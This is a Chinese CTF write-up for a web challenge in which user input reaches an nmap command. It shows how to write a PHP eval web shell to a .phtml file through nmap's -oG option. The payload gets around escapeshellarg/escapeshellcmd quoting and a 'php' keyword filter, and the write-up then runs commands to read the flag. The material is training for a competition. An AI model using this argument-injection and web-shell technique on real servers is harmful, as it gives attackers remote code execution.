[网鼎杯 2020 朱雀组]Nmap 1

[网鼎杯 2020 朱雀组]Nmap 1

首先得到题目打开得到

在这里插入图片描述

说是输入houst和IP进行扫描

测试一波:127.0.0.1

得到:

在这里插入图片描述

本地测一下nmap 命令得到:

在这里插入图片描述
发现效果一样

这里需要知道
nmap 命令将扫描结果保存在文件里面:

例如:将nmap 127.0.0.1的结果保存在test.txt里面

nmap 127.0.0.1 -oN test.txt

在这里插入图片描述

nmap其他写文件命令:

-oN (标准输出)

-oX (XML输出)

-oS (ScRipT KIdd|3 oUTpuT)

-oG (Grep输出)

-oA (输出至所有格式)

这样我们就能写shell

<?= @eval($_POST[1]); ?> -oG a.phtml

回到题目测试得到:

在这里插入图片描述

发现有检查测试一下过滤了写什么

发现过滤了php

就想办法绕过:

<?php ?>这里的php用短标签代替:<?= ?>

文件格式用:phtml代替

所以playload:

<?= @eval($_POST[1]); ?> -oG a.phtml

在这里插入图片描述
发现没有写入文件

应为进行了escapeshellarg()与escapeshellcmd()函数处理保护,没法产生文件

可以进行单引号和空格绕过,
具体看大佬博客:https://paper.seebug.org/164/

得到playload:

' <?= @eval($_POST[1]);?> -oG a.phtml '

写入成功:

在这里插入图片描述
访问得到:

在这里插入图片描述

执行命令获取flag

在这里插入图片描述
参考博客:

https://blog.csdn.net/m0_52199518/article/details/115454428

  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值